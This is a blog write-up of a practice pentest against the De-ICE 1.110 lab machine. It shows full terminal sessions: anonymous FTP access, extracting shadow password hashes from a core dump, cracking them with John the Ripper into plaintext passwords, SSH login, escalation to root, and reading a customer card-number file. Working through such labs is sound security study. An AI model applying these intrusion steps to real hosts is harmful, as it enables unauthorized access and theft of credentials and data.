:: Abstinence Surrender ::: Lab 3 : Pentesting On Lab DIsk #1.10 v1.0

1. Information Gathering

First step is gathering information from target. In here I will scanning first to gathering information from target, and now I using nmap

We was find IP address the target namely 192.168.1.110 and there are more services that run like ftp on port 21, ssh on port 22, http on port 80, and ipp 631.

2. Service Enumeration

On section information gathering already shown services that running , but I want got description about services and port, so I run nmap again using <options> :

Like on screenshot above, nmap mendiskripsikan that :

port 21 ftp ==> allowed to login using Anonymous

port 22 ssh ==> ssh login

port 80 http ==> version of apache httpd 2.2.4

port 631 ipp ==> provides a standard network protocol for remote printing

3. Vulnerabillity Assesment

Capital of gathering information and service enumeration above, I found the vulnerabillity on system of target namely ftp, ssh, http.

- HTTP

Open IP address the target on browser and see what that inside

See on section that marked by me, description of system admin and crew and also shown the email.

Now I will login on ftp using User anonymous and password anonymous

root@bt:~# ftp 192.168.1.110

Connected to 192.168.1.110.

220 (vsFTPd 2.0.4)

Name (192.168.1.110:root): anonymous

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 7 1000 513 160 Mar 15 2007 download

drwxrwxrwx 2 0 0 60 Feb 26 2007 incoming

226 Directory send OK.

ftp> cd download

250 Directory successfully changed.

ftp> ls -a

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 7 1000 513 160 Mar 15 2007 .

drwxr-xr-x 4 0 0 80 Mar 15 2007 ..

drwxr-xr-x 6 1000 513 340 Mar 15 2007 etc

drwxr-xr-x 4 1000 513 100 Mar 15 2007 opt

drwxr-xr-x 10 1000 513 400 Mar 15 2007 root

drwxr-xr-x 5 1000 513 120 Mar 15 2007 usr

drwxr-xr-x 3 1000 513 80 Mar 15 2007 var

226 Directory send OK.

ftp> cd etc

250 Directory successfully changed.

ftp> ls -la

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x 6 1000 513 340 Mar 15 2007 .

drwxr-xr-x 7 1000 513 160 Mar 15 2007 ..

drwxr-xr-x 4 1000 513 160 Mar 15 2007 X11

-rw-r--r-- 1 1000 513 362436 Mar 03 2007 core

drwxr-xr-x 2 1000 513 100 Mar 15 2007 fonts

-rw-r--r-- 1 1000 513 780 Apr 30 2005 hosts

-rw-r--r-- 1 1000 513 718 Jul 03 2005 inputrc

-rw-r--r-- 1 1000 513 1296 Jun 10 2006 issue

-rw-r--r-- 1 1000 513 183 Jun 23 2005 lisarc

-rw-r--r-- 1 1000 513 56 Oct 21 2004 localtime

lrwxrwxrwx 1 1000 513 23 Nov 09 14:18 localtime-copied-from -> /usr/share/zoneinfo/GMT

-rw-r--r-- 1 1000 513 10289 Dec 31 2003 login.defs

-rw-r--r-- 1 1000 513 1 Dec 31 2003 motd-slax

drwxr-xr-x 2 1000 513 100 Mar 15 2007 profile.d

drwxr-xr-x 2 1000 513 220 Mar 15 2007 rc.d

-rw-r--r-- 1 1000 513 440 Jul 18 2006 shadow

226 Directory send OK.

ftp> get core

local: core remote: core

200 PORT command successful. Consider using PASV.

150 Opening BINARY mode data connection for core (362436 bytes).

226 File send OK.

362436 bytes received in 0.02 secs (18602.1 kB/s)

ftp> exit

421 Timeout.

Above is process to see the content in ftp folder. And I found file core (see on yellow block), core file is file that saving core dump data (memory, storage, dan debugging dump). Then I put the file core using command get (like above) and this will be automated saved on our root directory.

Cek on our directory

And cek the content of core file

root@bt:~# strings core

tdxt

CORE

test.pl

/usr/bin/perl ./test.pl -d

CORE

FLINUX

!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~

ocks

CPLUS_INCLUDE_PATH=/usr/lib/qt/include:/usr/lib/qt/include

MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/opt/kde/man:/usr/lib/qt/doc/man

KDE_MULTIHEAD=false

HZ=100

HOSTNAME=slax.slackware-live.cd

SHELL=/bin/bash

TERM=xterm

GTK2_RC_FILES=/etc/gtk-2.0/gtkrc:/root/.gtkrc-2.0:/root/.kde/share/config/gtkrc-2.0

GTK_RC_FILES=/etc/gtk/gtkrc:/root/.gtkrc:/root/.kde/share/config/gtkrc

GS_LIB=/root/.fonts

WINDOWID=25165831

HUSHLOGIN=FALSE

QTDIR=/usr/lib/qt

LC_ALL=C

KDE_FULL_SESSION=true

USER=root

. . . . . . . . . . . . .

.gnu.version_d

.text

.note

.eh_frame_hdr

.eh_frame

.dynamic

.useless

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

In the end of content, it is the user's password hash string of De-ICE. We not possible to login using the password hash like above because still encrypted.

3. Exploit

After we got the hash password, we have to do to decrypt the password hash by crack it. in here I using JTR (John The Ripper). For description for JTR please visit here.

The hash password :

We need to filtered, because we only need user and password to login into ssh later. Like this :

root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::

aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::

bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::

ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::

Oke, We was got four users and encrypted password.

The next is cracking using John The Ripper. before we doing to crack, we must have a wordlist as dictionary by JTR.

Now open John The Ripper on your Backtrack /pentest/passwords/john

To see how to usahe you can type john

Now start to crack, this process maybe need long time depending your computer specification :D

On above we was succes crack the password and foun three users and password like :

Complexity (root)

Diatomaceous (ccoffee)

Zymurgy (bbanter)

Afterthat, trying to login into ssh. I not screenshot for this, because too long, so I copy from konsole.

I login using user bbanter

root@bt:~# ssh bbanter@192.168.1.110

bbanter@192.168.1.110's password: ********

Linux 2.6.16.

bbanter@slax:~$

Then login into root (Higest Privilege)

bbanter@slax:~$ su

Password: **********

root@slax:/home/bbanter#

OMG !! Now I on the root system :D

What are you doing after you succes login into root ? It's up to you :D

In below is that I doing namely look around what the content of system

root@slax:/home/bbanter# ls

root@slax:/home/bbanter# cd /home/

root@slax:/home#

root@slax:/home# ls

aadams bbanter ccoffee ftp root

root@slax:/home# cd root/

root@slax:/home/root# ls -lh

total 0

root@slax:/home/root# ls

root@slax:/home/root# ls -a

. .. .save .screenrc

root@slax:/home/root# cd .screenrc

bash: cd: .screenrc: Not a directory

root@slax:/home/root# cat .screenrc

# Example of a user's .screenrc file

# This is how one can set a reattach password:

# password ODSJQf.4IJN7E # "1234"

# no annoying audible bell, please

vbell on

# detach on hangup

autodetach on

# don't display the copyright page

startup_message off

# emulate .logout message

pow_detach_msg "Screen session of \$LOGNAME \$:cr:\$:nl:ended."

# advertise hardstatus support to $TERMCAP

# termcapinfo * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\'

# make the shell in every window a login shell

#shell -$SHELL

# autoaka testing

# shellaka '> |tcsh'

# shellaka '$ |sh'

# set every new windows hardstatus line to somenthing descriptive

# defhstatus "screen: ^En (^Et)"

defscrollback 1000

# don't kill window after the process died

# zombie "^["

# enable support for the "alternate screen" capability in all windows

# altscreen on

################

# xterm tweaks

#xterm understands both im/ic and doesn't have a status line.

#Note: Do not specify im and ic in the real termcap/info file as

#some programs (e.g. vi) will not work anymore.

termcap xterm hs@:cs=\E[%i%d;%dr:im=\E[4h:ei=\E[4l

terminfo xterm hs@:cs=\E[%i%p1%d;%p2%dr:im=\E[4h:ei=\E[4l

#80/132 column switching must be enabled for ^AW to work

#change init sequence to not switch width

termcapinfo xterm Z0=\E[?3h:Z1=\E[?3l:is=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;4;6l

# Make the output buffer large for (fast) xterms.

#termcapinfo xterm* OL=10000

termcapinfo xterm* OL=100

# tell screen that xterm can switch to dark background and has function

# keys.

termcapinfo xterm 'VR=\E[?5h:VN=\E[?5l'

termcapinfo xterm 'k1=\E[11~:k2=\E[12~:k3=\E[13~:k4=\E[14~'

termcapinfo xterm 'kh=\EOH:kI=\E[2~:kD=\E[3~:kH=\EOF:kP=\E[5~:kN=\E[6~'

# special xterm hardstatus: use the window title.

termcapinfo xterm 'hs:ts=\E]2;:fs=\007:ds=\E]2;screen\007'

#terminfo xterm 'vb=\E[?5h$<200/>\E[?5l'

termcapinfo xterm 'vi=\E[?25l:ve=\E[34h\E[?25h:vs=\E[34l'

# emulate part of the 'K' charset

termcapinfo xterm 'XC=K%,%\E(B,[\304,\\\\\326,]\334,{\344,|\366,}\374,~\337'

# xterm-52 tweaks:

# - uses background color for delete operations

termcapinfo xterm* be

################

# wyse terminals

#wyse-75-42 must have flow control (xo = "terminal uses xon/xoff")

#essential to have it here, as this is a slow terminal.

termcapinfo wy75-42 xo:hs@

# New termcap sequences for cursor application mode.

termcapinfo wy* CS=\E[?1h:CE=\E[?1l:vi=\E[?25l:ve=\E[?25h:VR=\E[?5h:VN=\E[?5l:cb=\E[1K:CD=\E[1J

################

# other terminals

# make hp700 termcap/info better

termcapinfo hp700 'Z0=\E[?3h:Z1=\E[?3l:hs:ts=\E[62"p\E[0$~\E[2$~\E[1$}:fs=\E[0}\E[61"p:ds=\E[62"p\E[1$~\E[61"p:ic@'

# Extend the vt100 desciption by some sequences.

termcap vt100* ms:AL=\E[%dL:DL=\E[%dM:UP=\E[%dA:DO=\E[%dB:LE=\E[%dD:RI=\E[%dC

terminfo vt100* ms:AL=\E[%p1%dL:DL=\E[%p1%dM:UP=\E[%p1%dA:DO=\E[%p1%dB:LE=\E[%p1%dD:RI=\E[%p1%dC

termcapinfo linux C8

# old rxvt versions also need this

# termcapinfo rxvt C8

################

# keybindings

#remove some stupid / dangerous key bindings

bind k

bind ^k

bind .

bind ^\

bind \\

bind ^h

bind h

#make them better

bind 'K' kill

bind 'I' login on

bind 'O' login off

bind '}' history

# Yet another hack:

# Prepend/append register [/] to the paste if ^a^] is pressed.

# This lets me have autoindent mode in vi.

bind ^] paste [.]

################

# default windows

# screen -t local 0

# screen -t mail 1 mutt

# screen -t 40 2 rlogin server

# caption always "%3n %t%? @%u%?%? [%h]%?%=%c"

# hardstatus alwaysignore

# hardstatus alwayslastline "%Lw"

# bind = resize =

# bind + resize +1

# bind - resize -1

# bind _ resize max

# defnonblock 1

# blankerprg rain -d 100

# idle 30 blanker

root@slax:/home/root# ls -a

. .. .save .screenrc

root@slax:/home/root# cat .save/

cat: .save/: Is a directory

root@slax:/home/root# cd .save/

root@slax:/home/root/.save# ls

copy.sh customer_account.csv customer_account.csv.enc

root@slax:/home/root/.save# cat cus

customer_account.csv customer_account.csv.enc

root@slax:/home/root/.save# cat customer_account.csv

"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"

1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"

1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"

1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"

1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"

1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"

1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"

root@slax:/home/root/.save#

Hehe.. I find the bank account like above :D

Finish ^^

:: Abstinence Surrender ::

Saturday, November 10, 2012

Lab 3 : Pentesting On Lab DIsk #1.10 v1.0

No comments:

Post a Comment